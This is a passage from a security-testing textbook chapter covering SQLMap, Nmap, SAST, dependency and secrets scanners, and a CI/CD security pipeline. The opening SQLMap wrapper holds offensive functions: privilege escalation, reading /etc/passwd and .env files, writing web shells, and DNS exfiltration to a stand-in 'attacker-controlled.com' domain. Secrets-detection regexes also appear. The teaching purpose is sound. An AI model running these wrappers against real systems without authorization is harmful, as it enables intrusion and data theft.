            '--priv-esc'      # Privilege escalation attempts
        ]
        
        return subprocess.run(cmd, capture_output=True, text=True)
    
    def file_read(self, remote_file):
        """
        Read files from database server filesystem
        Common targets: /etc/passwd, web.config, .env files
        """
        cmd = self.base_cmd + [
            '--file-read', remote_file,
            '--threads=4'
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # SQLMap saves files to specific directory
        # Parse output to find saved location
        for line in result.stdout.split('\n'):
            if 'saved to' in line:
                return line.split('saved to')[1].strip()
        
        return None
    
    def file_write(self, local_file, remote_path):
        """
        Write files to database server (e.g., web shells)
        WARNING: Extremely dangerous - legal issues if unauthorized!
        """
        cmd = self.base_cmd + [
            '--file-write', local_file,
            '--file-dest', remote_path
        ]
        
        return subprocess.run(cmd, capture_output=True, text=True)
    
    def dns_exfiltration_test(self):
        """
        Test for out-of-band SQL injection (DNS exfiltration)
        Useful when inbound traffic is restricted but DNS is allowed
        """
        cmd = self.base_cmd + [
            '--dns-domain', 'attacker-controlled.com',
            '--technique=T',  # Time-based
            '--level=5',
            '--risk=3'
        ]
        
        return subprocess.run(cmd, capture_output=True, text=True)
    
    def second_order_injection_test(self, second_url):
        """
        Test for second-order SQL injection (stored injection)
        Payload stored in one request, executed in another
        """
        cmd = self.base_cmd + [
            '--second-url', second_url,
            '--second-req', 'second_request.txt',  # File containing second request
            '--level=3'
        ]
        
        return subprocess.run(cmd, capture_output=True, text=True)
    
    def generate_scan_report(self):
        """
        Generate comprehensive HTML report
        """
        cmd = self.base_cmd + [
            '--har', 'traffic.har',      # HTTP Archive format
            '--flush-session',
            '--answers', 'Y',            # Answer yes to all questions
            '--smart',                   # Only test parameters that look injectable
            '--forms',                   # Test forms on target URL
            '--crawl=3'                  # Crawl depth
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # Generate report from logs
        report = {
            'target': self.target,
            'timestamp': datetime.now().isoformat(),
            'findings': self._extract_findings(result.stdout),
            'recommendations': self._generate_recommendations()
        }
        
        return report
    
    def _extract_findings(self, output):
        """Extract structured findings from output"""
        findings = []
        # Implementation specific parsing
        return findings
    
    def _generate_recommendations(self):
        """Generate remediation recommendations"""
        return [
            "Use parameterized queries (prepared statements)",
            "Implement input validation and sanitization",
            "Apply principle of least privilege to database accounts",
            "Enable Web Application Firewall (WAF) with SQLi rules",
            "Regular security testing and code reviews"
        ]
```

---

## **39.4 Nmap**

### **39.4.1 Network Scanning**

**What is Nmap?**

Nmap (Network Mapper) is a free and open-source utility for network discovery and security auditing. It is used to discover hosts and services on a computer network by sending packets and analyzing the responses.

**Key Capabilities:**
- Host discovery (ping sweeps)
- Port scanning (TCP, UDP, SCTP)
- Service and version detection
- OS fingerprinting
- Scriptable interaction with the target (NSE - Nmap Scripting Engine)
- Vulnerability detection

**Basic Scanning Techniques:**

```python
# Python Nmap integration using python-nmap library
# pip install python-nmap

import nmap
import json
from datetime import datetime

class NmapScanner:
    def __init__(self):
        self.scanner = nmap.PortScanner()
    
    def ping_sweep(self, network_cidr):
        """
        Discover live hosts in network range
        Example: 192.168.1.0/24
        """
        print(f"Scanning network: {network_cidr}")
        
        # -sn: Ping scan (no port scan)
        self.scanner.scan(hosts=network_cidr, arguments='-sn')
        
        live_hosts = []
        for host in self.scanner.all_hosts():
            if self.scanner[host].state() == 'up':
                live_hosts.append({
                    'ip': host,
                    'hostname': self.scanner[host].hostname(),
                    'mac': self.scanner[host]['addresses'].get('mac', 'Unknown'),
                    'vendor': self.scanner[host]['vendor'].get(
                        self.scanner[host]['addresses'].get('mac', ''), 
                        'Unknown'
                    )
                })
        
        return live_hosts
    
    def port_scan(self, target, ports="1-65535", scan_type="syn"):
        """
        Comprehensive port scanning
        scan_type options: syn, connect, ack, window, maimon
        """
        arguments = {
            'syn': '-sS -T4',      # SYN scan (stealthy, requires root)
            'connect': '-sT -T4',  # TCP Connect scan (no root needed)
            'udp': '-sU -T4',      # UDP scan
            'comprehensive': '-sS -sV -sC -A -O -T4'  # Full enumeration
        }
        
        scan_args = arguments.get(scan_type, arguments['syn'])
        
        print(f"Scanning {target} ports {ports}...")
        
        self.scanner.scan(target, ports, arguments=scan_args)
        
        results = {}
        for host in self.scanner.all_hosts():
            host_info = {
                'state': self.scanner[host].state(),
                'protocols': {}
            }
            
            for proto in self.scanner[host].all_protocols():
                ports_info = {}
                for port in self.scanner[host][proto].keys():
                    port_data = self.scanner[host][proto][port]
                    ports_info[port] = {
                        'state': port_data['state'],
                        'service': port_data['name'],
                        'version': port_data.get('version', 'Unknown'),
                        'product': port_data.get('product', 'Unknown'),
                        'extrainfo': port_data.get('extrainfo', ''),
                        'cpe': port_data.get('cpe', '')
                    }
                host_info['protocols'][proto] = ports_info
            
            # OS Detection
            if 'osmatch' in self.scanner[host]:
                host_info['os'] = self.scanner[host]['osmatch']
            
            results[host] = host_info
        
        return results
    
    def vulnerability_scan(self, target):
        """
        Vulnerability scanning using NSE scripts
        """
        # --script vuln: Run vulnerability detection scripts
        # --script-args: Pass arguments to scripts
        arguments = '--script vuln -sV -T4'
        
        self.scanner.scan(target, arguments=arguments)
        
        vulnerabilities = []
        
        for host in self.scanner.all_hosts():
            if 'tcp' in self.scanner[host]:
                for port in self.scanner[host]['tcp']:
                    port_info = self.scanner[host]['tcp'][port]
                    
                    # Check for script results (vulnerabilities)
                    if 'script' in port_info:
                        for script_name, output in port_info['script'].items():
                            vulnerabilities.append({
                                'host': host,
                                'port': port,
                                'service': port_info.get('name', 'unknown'),
                                'vulnerability': script_name,
                                'details': output,
                                'severity': self._classify_severity(script_name, output)
                            })
        
        return vulnerabilities
    
    def ssl_tls_analysis(self, target):
        """
        SSL/TLS security analysis
        """
        # ssl-enum-ciphers: Check supported ciphers
        # ssl-heartbleed: Check for Heartbleed vulnerability
        # ssl-poodle: Check for POODLE vulnerability
        # ssl-dh-params: Check Diffie-Hellman parameters
        
        scripts = [
            'ssl-enum-ciphers',
            'ssl-heartbleed',
            'ssl-poodle',
            'ssl-dh-params',
            'ssl-cert'
        ]
        
        script_args = ','.join(scripts)
        arguments = f'--script {script_args} -p 443,8443'
        
        self.scanner.scan(target, arguments=arguments)
        
        ssl_results = {}
        
        for host in self.scanner.all_hosts():
            if 'tcp' in self.scanner[host]:
                for port in [443, 8443]:
                    if port in self.scanner[host]['tcp']:
                        port_data = self.scanner[host]['tcp'][port]
                        
                        if 'script' in port_data:
                            ssl_results[f"{host}:{port}"] = port_data['script']
        
        return ssl_results
    
    def generate_report(self, scan_results, output_file='nmap_report.json'):
        """
        Generate structured security report
        """
        report = {
            'scan_date': datetime.now().isoformat(),
            'summary': {
                'total_hosts': len(scan_results),
                'open_ports': sum(
                    1 for host in scan_results.values() 
                    for proto in host.get('protocols', {}).values() 
                    for port in proto.values() 
                    if port['state'] == 'open'
                )
            },
            'findings': scan_results,
            'recommendations': self._generate_recommendations(scan_results)
        }
        
        with open(output_file, 'w') as f:
            json.dump(report, f, indent=2)
        
        return report
    
    def _classify_severity(self, script_name, output):
        """
        Classify vulnerability severity based on script and output
        """
        high_severity = ['cve', 'exploit', 'vuln', 'critical']
        medium_severity = ['warning', 'weak', 'deprecated']
        
        name_lower = script_name.lower()
        output_lower = output.lower()
        
        if any(h in name_lower or h in output_lower for h in high_severity):
            return 'High'
        elif any(m in name_lower or m in output_lower for m in medium_severity):
            return 'Medium'
        else:
            return 'Low'
    
    def _generate_recommendations(self, results):
        """
        Generate security recommendations based on findings
        """
        recommendations = []
        
        for host, data in results.items():
            for proto, ports in data.get('protocols', {}).items():
                for port, info in ports.items():
                    if info['state'] == 'open':
                        # Check for risky services
                        if info['service'] in ['telnet', 'ftp', 'rsh', 'rlogin']:
                            recommendations.append({
                                'host': host,
                                'port': port,
                                'issue': f"Insecure service: {info['service']}",
                                'recommendation': f"Disable {info['service']} and use SSH instead"
                            })
                        
                        # Check for outdated versions
                        if info.get('version') and 'old' in info.get('extrainfo', '').lower():
                            recommendations.append({
                                'host': host,
                                'port': port,
                                'issue': f"Outdated service version: {info['product']} {info['version']}",
                                'recommendation': "Update to latest version"
                            })
        
        return recommendations

# Usage Example
if __name__ == "__main__":
    scanner = NmapScanner()
    
    # Network discovery
    live_hosts = scanner.ping_sweep("192.168.1.0/24")
    print(f"Found {len(live_hosts)} live hosts")
    
    # Detailed scan on specific target
    if live_hosts:
        target = live_hosts[0]['ip']
        port_scan = scanner.port_scan(target, ports="1-1000", scan_type="comprehensive")
        
        # Vulnerability scan
        vulns = scanner.vulnerability_scan(target)
        
        # Generate report
        scanner.generate_report(port_scan)
```

### **39.4.2 Nmap Scripting Engine (NSE)**

```python
# Advanced NSE Script usage for security testing
class NmapNSE:
    """
    Nmap Scripting Engine for advanced security testing
    """
    
    def __init__(self):
        self.scanner = nmap.PortScanner()
    
    def http_security_scan(self, target):
        """
        Comprehensive HTTP security scanning
        """
        scripts = [
            'http-title',
            'http-headers',
            'http-methods',           # Check for dangerous methods (PUT, DELETE)
            'http-trace',             # TRACE method (XST attacks)
            'http-cookie-flags',      # Secure, HttpOnly flags
            'http-cors',              # CORS misconfigurations
            'http-csrf',              # CSRF token detection
            'http-slowloris-check',   # DoS vulnerability
            'http-shellshock',        # Shellshock vulnerability
            'http-vuln-cve2017-5638', # Apache Struts RCE
            'http-vuln-cve2017-1001000', # Jenkins RCE
            'http-wordpress-enum',    # WordPress enumeration
            'http-iis-short-name-brute'  # IIS short name disclosure
        ]
        
        script_str = ','.join(scripts)
        arguments = f'--script {script_str} -p 80,443,8080,8443'
        
        self.scanner.scan(target, arguments=arguments)
        return self._parse_script_results(target)
    
    def database_security_scan(self, target):
        """
        Database security assessment
        """
        scripts = [
            'mysql-empty-password',
            'mysql-info',
            'mysql-vuln-cve2012-2122',
            'pgsql-brute',            # PostgreSQL brute force
            'ms-sql-info',
            'ms-sql-empty-password',
            'redis-info',
            'mongodb-info',
            'cassandra-info'
        ]
        
        script_str = ','.join(scripts)
        arguments = f'--script {script_str} -p 3306,5432,1433,6379,27017,9042'
        
        self.scanner.scan(target, arguments=arguments)
        return self._parse_script_results(target)
    
    def smb_security_scan(self, target):
        """
        SMB/CIFS security assessment
        """
        scripts = [
            'smb-os-discovery',
            'smb-security-mode',
            'smb-enum-shares',
            'smb-enum-users',
            'smb-vuln-ms08-067',      # Conficker
            'smb-vuln-ms17-010',      # EternalBlue
            'smb-double-pulsar-backdoor'
        ]
        
        script_str = ','.join(scripts)
        arguments = f'--script {script_str} -p 445,139'
        
        self.scanner.scan(target, arguments=arguments)
        
        # Special handling for SMB vulnerabilities
        results = {}
        for host in self.scanner.all_hosts():
            if 'hostscript' in self.scanner[host]:
                results[host] = self.scanner[host]['hostscript']
        
        return results
    
    def custom_nse_scan(self, target, script_file, args=None):
        """
        Run custom NSE script
        """
        arguments = f'--script {script_file}'
        if args:
            arguments += f' --script-args {args}'
        
        self.scanner.scan(target, arguments=arguments)
        return self.scanner[target]
    
    def _parse_script_results(self, target):
        """Helper to parse NSE script results"""
        results = {}
        for host in self.scanner.all_hosts():
            results[host] = {}
            if 'tcp' in self.scanner[host]:
                for port, data in self.scanner[host]['tcp'].items():
                    if 'script' in data:
                        results[host][port] = data['script']
        return results
```

---

## **39.5 Other Security Tools**

### **39.5.1 Static Application Security Testing (SAST)**

**SonarQube Integration:**

```yaml
# sonar-project.properties
sonar.projectKey=myapp-security
sonar.projectName=My Application Security Scan
sonar.sources=src
sonar.exclusions=**/test/**,**/node_modules/**
sonar.language=py,js,java

# Security specific settings
sonar.security.hotspots.level=HIGH
sonar.security.analysis=true

# Quality Gate - fail on security issues
sonar.qualitygate.wait=true
```

```python
# SonarQube API Integration
import requests

class SonarQubeSecurity:
    def __init__(self, url, token):
        self.url = url
        self.token = token
        self.auth = (token, '')  # Token as username, empty password
    
    def get_security_hotspots(self, project_key):
        """
        Get security hotspots (potential vulnerabilities)
        """
        endpoint = f"{self.url}/api/hotspots/search"
        params = {
            'projectKey': project_key,
            'status': 'TO_REVIEW',  # Only unresolved
            'ps': 500  # Page size
        }
        
        response = requests.get(endpoint, params=params, auth=self.auth)
        data = response.json()
        
        hotspots = []
        for hotspot in data.get('hotspots', []):
            hotspots.append({
                'key': hotspot['key'],
                'component': hotspot['component'],
                'message': hotspot['message'],
                'severity': hotspot['vulnerabilityProbability'],
                'category': hotspot['securityCategory'],
                'line': hotspot.get('line'),
                'status': hotspot['status']
            })
        
        return hotspots
    
    def get_vulnerabilities(self, project_key, severities='BLOCKER,CRITICAL,MAJOR'):
        """
        Get confirmed vulnerabilities
        """
        endpoint = f"{self.url}/api/issues/search"
        params = {
            'componentKeys': project_key,
            'types': 'VULNERABILITY',
            'severities': severities,
            'statuses': 'OPEN,CONFIRMED,REOPENED'
        }
        
        response = requests.get(endpoint, params=params, auth=self.auth)
        data = response.json()
        
        vulnerabilities = []
        for issue in data.get('issues', []):
            vulnerabilities.append({
                'key': issue['key'],
                'rule': issue['rule'],
                'severity': issue['severity'],
                'component': issue['component'],
                'message': issue['message'],
                'line': issue.get('line'),
                'type': issue['type']
            })
        
        return vulnerabilities
    
    def check_quality_gate(self, project_key):
        """
        Check if project passes security quality gate
        """
        endpoint = f"{self.url}/api/qualitygates/project_status"
        params = {'projectKey': project_key}
        
        response = requests.get(endpoint, params=params, auth=self.auth)
        data = response.json()
        
        return {
            'status': data['projectStatus']['status'],  # OK or ERROR
            'conditions': data['projectStatus'].get('conditions', [])
        }
```

### **39.5.2 Software Composition Analysis (SCA)**

**Dependency-Check and Snyk:**

```python
# Dependency vulnerability scanning
import subprocess
import json

class DependencyScanner:
    def __init__(self, project_path):
        self.project_path = project_path
    
    def run_dependency_check(self):
        """
        OWASP Dependency-Check scan
        """
        cmd = [
            'dependency-check.sh',
            '--project', 'MyApp',
            '--scan', self.project_path,
            '--format', 'JSON',
            '--format', 'HTML',
            '--out', 'dependency-check-report',
            '--enableExperimental'  # Include experimental analyzers
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # Parse JSON report
        report_path = 'dependency-check-report/dependency-check-report.json'
        try:
            with open(report_path, 'r') as f:
                report = json.load(f)
            
            vulnerabilities = []
            for dependency in report.get('dependencies', []):
                if 'vulnerabilities' in dependency:
                    for vuln in dependency['vulnerabilities']:
                        vulnerabilities.append({
                            'dependency': dependency['fileName'],
                            'cve': vuln.get('name'),
                            'severity': vuln.get('severity'),
                            'cvss_score': vuln.get('cvssv3', {}).get('baseScore'),
                            'description': vuln.get('description'),
                            'remediation': 'Upgrade to: ' + str(vuln.get('vulnerableSoftware', []))
                        })
            
            return vulnerabilities
            
        except FileNotFoundError:
            return []
    
    def snyk_scan(self):
        """
        Snyk vulnerability scan
        """
        cmd = ['snyk', 'test', '--json', self.project_path]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        if result.returncode in [0, 1]:  # 0 = no vulns, 1 = vulns found
            findings = json.loads(result.stdout)
            
            vulnerabilities = []
            for vuln in findings.get('vulnerabilities', []):
                vulnerabilities.append({
                    'id': vuln.get('id'),
                    'title': vuln.get('title'),
                    'severity': vuln.get('severity'),
                    'package': vuln.get('packageName'),
                    'version': vuln.get('version'),
                    'fixed_in': vuln.get('fixedIn', ['No fix available']),
                    'cvss_score': vuln.get('cvssScore'),
                    'exploit_maturity': vuln.get('exploit')
                })
            
            return vulnerabilities
        
        return []
```

### **39.5.3 Secrets Scanning**

```python
# Secrets detection using GitLeaks or TruffleHog
import re
import subprocess

class SecretsScanner:
    def __init__(self, repo_path):
        self.repo_path = repo_path
        self.patterns = {
            'AWS Access Key': r'AKIA[0-9A-Z]{16}',
            'AWS Secret Key': r'[0-9a-zA-Z/+]{40}',
            'GitHub Token': r'ghp_[0-9a-zA-Z]{36}',
            'Slack Token': r'xox[baprs]-[0-9a-zA-Z]{10,48}',
            'Private Key': r'-----BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----',
            'API Key Generic': r'[Aa][Pp][Ii]_?[Kk][Ee][Yy].*[:=]\s*[\'"][0-9a-zA-Z]{32,}[\'"]',
            'Password': r'[Pp][Aa][Ss][Ss][Ww][Oo][Rr][Dd].*[:=]\s*[\'"][^\'"]+[\'"]'
        }
    
    def scan_with_gitleaks(self):
        """
        Run GitLeaks for comprehensive secrets scanning
        """
        cmd = [
            'gitleaks',
            'detect',
            '--source', self.repo_path,
            '--verbose',
            '--report-format', 'json',
            '--report-path', 'gitleaks-report.json'
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # Parse report
        try:
            with open('gitleaks-report.json', 'r') as f:
                leaks = json.load(f)
            
            findings = []
            for leak in leaks:
                findings.append({
                    'description': leak.get('Description'),
                    'file': leak.get('File'),
                    'line': leak.get('StartLine'),
                    'match': leak.get('Match'),
                    'commit': leak.get('Commit'),
                    'author': leak.get('Author'),
                    'email': leak.get('Email'),
                    'date': leak.get('Date')
                })
            
            return findings
        except:
            return []
    
    def trufflehog_scan(self):
        """
        Run TruffleHog (scans git history and filesystem)
        """
        cmd = [
            'trufflehog',
            'filesystem',
            self.repo_path,
            '--json',
            '--only-verified'  # Only report verified secrets
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        findings = []
        for line in result.stdout.strip().split('\n'):
            if line:
                finding = json.loads(line)
                findings.append({
                    'detector': finding.get('DetectorName'),
                    'file': finding.get('SourceMetadata', {}).get('Data', {}).get('Filesystem', {}).get('file'),
                    'raw': finding.get('Raw'),
                    'verified': finding.get('Verified')
                })
        
        return findings
    
    def regex_scan(self):
        """
        Simple regex-based scanning (fallback)
        """
        import os
        
        findings = []
        
        for root, dirs, files in os.walk(self.repo_path):
            # Skip common non-code directories
            dirs[:] = [d for d in dirs if d not in ['node_modules', '.git', '__pycache__', 'venv']]
            
            for file in files:
                if file.endswith(('.py', '.js', '.java', '.yml', '.yaml', '.json', '.env', '.properties')):
                    file_path = os.path.join(root, file)
                    
                    try:
                        with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                            content = f.read()
                            lines = content.split('\n')
                            
                            for line_num, line in enumerate(lines, 1):
                                for pattern_name, pattern in self.patterns.items():
                                    matches = re.finditer(pattern, line)
                                    for match in matches:
                                        findings.append({
                                            'file': file_path,
                                            'line': line_num,
                                            'type': pattern_name,
                                            'match': match.group(),
                                            'context': line.strip()
                                        })
                    except Exception as e:
                        continue
        
        return findings
```

---

## **39.6 Building a Security Testing Pipeline**

### **Integrated CI/CD Security Pipeline**

```yaml
# Complete GitHub Actions Security Pipeline
name: Security Testing Pipeline

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]
  schedule:
    - cron: '0 0 * * 0'  # Weekly full scan

jobs:
  # 1. Secrets Scanning (Fast - run first)
  secrets-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          fetch-depth: 0  # Full history for git secrets
      
      - name: GitLeaks Scan
        uses: zricethezav/gitleaks-action@v1.6.0
        with:
          config-path: .gitleaks.toml
      
      - name: TruffleHog Scan
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: main
          head: HEAD
          extra_args: --debug --only-verified

  # 2. SAST (Static Analysis)
  sast:
    runs-on: ubuntu-latest
    needs: secrets-scan
    steps:
      - uses: actions/checkout@v3
      
      - name: SonarQube Scan
        uses: sonarqube-quality-gate-action@master
        with:
          scanMetadataReportFile: .scannerwork/report-task.txt
        timeout-minutes: 5
      
      - name: Bandit (Python)
        if: matrix.language == 'python'
        run: |
          pip install bandit
          bandit -r . -f json -o bandit-report.json || true
          bandit -r . -f screen
      
      - name: ESLint Security (JavaScript)
        if: matrix.language == 'javascript'
        run: |
          npm install eslint-plugin-security
          npx eslint . --ext .js,.jsx

  # 3. SCA (Dependency Check)
  dependency-check:
    runs-on: ubuntu-latest
    needs: secrets-scan
    steps:
      - uses: actions/checkout@v3
      
      - name: OWASP Dependency-Check
        uses: dependency-check/Dependency-Check_Action@main
        with:
          project: 'my-app'
          path: '.'
          format: 'ALL'
          args: >
            --enableRetired
            --enableExperimental
      
      - name: Upload Dependency Check Report
        uses: actions/upload-artifact@v3
        with:
          name: dependency-check-report
          path: reports/

  # 4. DAST (Dynamic Analysis)
  dast:
    runs-on: ubuntu-latest
    needs: [sast, dependency-check]
    if: github.event_name == 'schedule' || github.ref == 'refs/heads/main'
    steps:
      - uses: actions/checkout@v3
      
      - name: Start Application
        run: |
          docker-compose up -d
          sleep 30
      
      - name: ZAP Baseline Scan
        uses: zaproxy/action-baseline@v0.7.0
        with:
          target: 'http://localhost:8080'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a'
      
      - name: ZAP Full Scan (Scheduled only)
        if: github.event_name == 'schedule'
        uses: zaproxy/action-full-scan@v0.4.0
        with:
          target: 'http://localhost:8080'
          rules_file_name: '.zap/rules.tsv'

  # 5. Container Security
  container-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Build Image
        run: docker build -t myapp:${{ github.sha }} .
      
      - name: Trivy Scan
        uses: aquasecurity/trivy-action@master
        with:
          image-ref: 'myapp:${{ github.sha }}'
          format: 'sarif'
          output: 'trivy-results.sarif'
          severity: 'CRITICAL,HIGH'
      
      - name: Upload Trivy Results
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: 'trivy-results.sarif'

  # 6. Security Report Aggregation
  security-report:
    runs-on: ubuntu-latest
    needs: [secrets-scan, sast, dependency-check, dast, container-scan]
    if: always()
    steps:
      - name: Download All Artifacts
        uses: actions/download-artifact@v3
      
      - name: Generate Security Dashboard
        run: |
          python scripts/aggregate_security_reports.py \
            --secrets gitleaks-report.json \
            --sast sonarqube-report.json \
            --sca dependency-check-report.json \
            --dast zap-report.json \
            --container trivy-results.sarif \
            --output security-dashboard.html
      
      - name: Upload Security Dashboard
        uses: actions/upload-artifact@v3
        with:
          name: security-dashboard
          path: security-dashboard.html
```

```python
# Security Report Aggregation Script
import json
import argparse
from datetime import datetime
from jinja2 import Template

class SecurityReportAggregator:
    def __init__(self):
        self.findings = {
            'critical': [],
            'high': [],
            'medium': [],
            'low': [],
            'info': []
        }
    
    def parse_gitleaks(self, file_path):
        """Parse GitLeaks secrets scan"""
        with open(file_path) as f:
            data = json.load(f)
        
        for leak in data:
            self.findings['high'].append({
                'tool': 'GitLeaks',
                'category': 'Secrets Leakage',
                'title': f"Hardcoded {leak.get('Description', 'Secret')}",
                'file': leak.get('File'),
                'line': leak.get('StartLine'),
                'remediation': 'Remove secret and rotate credentials immediately'
            })
    
    def parse_dependency_check(self, file_path):
        """Parse OWASP Dependency-Check report"""
        with open(file_path) as f:
            data = json.load(f)
        
        for dep in data.get('dependencies', []):
            for vuln in dep.get('vulnerabilities', []):
                severity = vuln.get('severity', 'LOW').lower()
                if severity in ['critical', 'high']:
                    category = 'critical' if severity == 'critical' else 'high'
                else:
                    category = severity
                
                self.findings[category].append({
                    'tool': 'Dependency-Check',
                    'category': 'Vulnerable Dependency',
                    'title': f"{vuln.get('name')} in {dep.get('fileName')}",
                    'cvss': vuln.get('cvssv3', {}).get('baseScore'),
                    'remediation': f"Upgrade to non-vulnerable version"
                })
    
    def parse_zap(self, file_path):
        """Parse ZAP scan results"""
        with open(file_path) as f:
            data = json.load(f)
        
        for site in data.get('site', []):
            for alert in site.get('alerts', []):
                risk = alert.get('riskdesc', 'Informational').split()[0].lower()
                
                self.findings[risk].append({
                    'tool': 'OWASP ZAP',
                    'category': alert.get('alert'),
                    'title': alert.get('name'),
                    'description': alert.get('desc'),
                    'solution': alert.get('solution'),
                    'instances': len(alert.get('instances', []))
                })
    
    def generate_html_report(self, output_file):
        """Generate consolidated HTML report"""
        template = Template("""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Security Assessment Report</title>
            <style>
                body { font-family: Arial, sans-serif; margin: 20px; }
                .header { background: #2c3e50; color: white; padding: 20px; }
                .summary { display: flex; gap: 20px; margin: 20px 0; }
                .metric { padding: 20px; border-radius: 5px; text-align: center; }
                .critical { background: #e74c3c; color: white; }
                .high { background: #e67e22; color: white; }
                .medium { background: #f1c40f; }
                .low { background: #3498db; color: white; }
                table { width: 100%; border-collapse: collapse; margin: 20px 0; }
                th, td { padding: 12px; text-align: left; border-bottom: 1px solid #ddd; }
                th { background: #34495e; color: white; }
                tr:hover { background: #f5f5f5; }
            </style>
        </head>
        <body>
            <div class="header">
                <h1>Security Assessment Report</h1>
                <p>Generated: {{ timestamp }}</p>
            </div>
            
            <div class="summary">
                <div class="metric critical">
                    <h2>{{ counts.critical }}</h2>
                    <p>Critical</p>
                </div>
                <div class="metric high">
                    <h2>{{ counts.high }}</h2>
                    <p>High</p>
                </div>
                <div class="metric medium">
                    <h2>{{ counts.medium }}</h2>
                    <p>Medium</p>
                </div>
                <div class="metric low">
                    <h2>{{ counts.low }}</h2>
                    <p>Low</p>
                </div>
            </div>
            
            <h2>Critical and High Findings</h2>
            <table>
                <tr>
                    <th>Severity</th>
                    <th>Tool</th>
                    <th>Category</th>
                    <th>Title</th>
                    <th>Remediation</th>
                </tr>
                {% for finding in critical_high %}
                <tr>
                    <td><strong>{{ finding.severity }}</strong></td>
                    <td>{{ finding.tool }}</td>
                    <td>{{ finding.category }}</td>
                    <td>{{ finding.title }}</td>
                    <td>{{ finding.remediation }}</td>
                </tr>
                {% endfor %}
            </table>
        </body>
        </html>
        """)
        
        counts = {
            'critical': len(self.findings['critical']),
            'high': len(self.findings['high']),
            'medium': len(self.findings['medium']),
            'low': len(self.findings['low'])
        }
        
        critical_high = self.findings['critical'] + self.findings['high']
        
        html = template.render(
            timestamp=datetime.now().isoformat(),
            counts=counts,
            critical_high=critical_high
        )
        
        with open(output_file, 'w') as f:
            f.write(html)
        
        return counts

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--secrets')
    parser.add_argument('--sca')
    parser.add_argument('--dast')
    parser.add_argument('--output')
    
    args = parser.parse_args()
    
    aggregator = SecurityReportAggregator()
    
    if args.secrets:
        aggregator.parse_gitleaks(args.secrets)
    if args.sca:
        aggregator.parse_dependency_check(args.sca)
    if args.dast:
        aggregator.parse_zap(args.dast)
    
    aggregator.generate_html_report(args.output)
```

---

## **Chapter Summary**

In this comprehensive chapter on **Security Testing Tools**, we covered the essential toolkit for modern application security testing:

**Key Tools and Techniques:**

1. **OWASP ZAP (39.1):** The industry-standard open-source DAST tool. We covered installation, automated scanning with Python API, authenticated scanning, API security testing (REST/GraphQL), and CI/CD integration for continuous security testing.

2. **Burp Suite Professional (39.2):** The leading manual penetration testing platform. We explored Proxy configuration for traffic interception, Repeater for manual request manipulation, Intruder for automated attacks (Sniper, Battering Ram, Pitchfork, Cluster Bomb), and Scanner integration for vulnerability detection.

3. **SQLMap (39.3):** Automated SQL injection detection and exploitation. We covered basic detection techniques, database enumeration, advanced features (OS shell access, file read/write), and Python integration for automated SQL injection testing.

4. **Nmap (39.4):** Network discovery and security auditing. We implemented host discovery, port scanning techniques (SYN, Connect, UDP), service version detection, OS fingerprinting, and the Nmap Scripting Engine (NSE) for vulnerability detection and specialized testing (HTTP, SSL, SMB, Database).

5. **Additional Security Tools (39.5):**
   - **SAST:** SonarQube integration for static code analysis
   - **SCA:** OWASP Dependency-Check and Snyk for vulnerable component detection
   - **Secrets Scanning:** GitLeaks and TruffleHog for credential leak detection

6. **Security Pipeline (39.6):** We built a complete CI/CD security pipeline integrating all tools with GitHub Actions, including secrets scanning (fast feedback), SAST (code quality), SCA (dependency check), DAST (runtime testing), and container security scanning.

**Industry Best Practices:**
- **Shift-Left Security:** Integrate security testing early in the SDLC
- **Defense in Depth:** Combine SAST, DAST, SCA, and secrets scanning
- **Automation:** Automate security testing in CI/CD pipelines
- **Risk-Based Prioritization:** Focus on Critical and High severity findings
- **Continuous Monitoring:** Regular scanning and immediate feedback

---

## **📖 Next Chapter: Chapter 40 - Security Testing Techniques**

Now that you have mastered the security testing tools, Chapter 40 will teach you **how to apply these tools effectively using industry-standard methodologies and frameworks**.

In **Chapter 40**, you will learn:

- **OWASP Testing Guide Methodology:** The comprehensive framework for web application security testing covering information gathering, configuration management, identity management, authentication, authorization, session management, input validation, error handling, cryptography, business logic, and client-side testing.

- **Penetration Testing Execution Standard (PTES):** Pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting phases.

- **NIST SP 800-115:** Technical Guide to Information Security Testing, including review techniques, target identification and analysis, and target vulnerability validation.

- **Bug Bounty Methodologies:** How to approach bug bounty programs, reconnaissance techniques, vulnerability triage, and responsible disclosure.

- **API Security Testing:** Specialized techniques for REST, SOAP, and GraphQL API security assessment, including authentication bypass, mass assignment, and injection attacks.

- **Mobile Security Testing:** iOS and Android specific testing techniques using tools like MobSF, Frida, and Objection.

- **Cloud Security Testing:** AWS, Azure, and GCP security assessment techniques, including IAM testing, S3 bucket enumeration, and container security.

**Chapter 40 will provide you with structured methodologies to ensure comprehensive security coverage, teaching you not just which tools to use, but how to think like a security tester and approach applications systematically to find vulnerabilities that automated tools miss.**

**Continue to Chapter 40 to master the art and science of security testing methodologies!**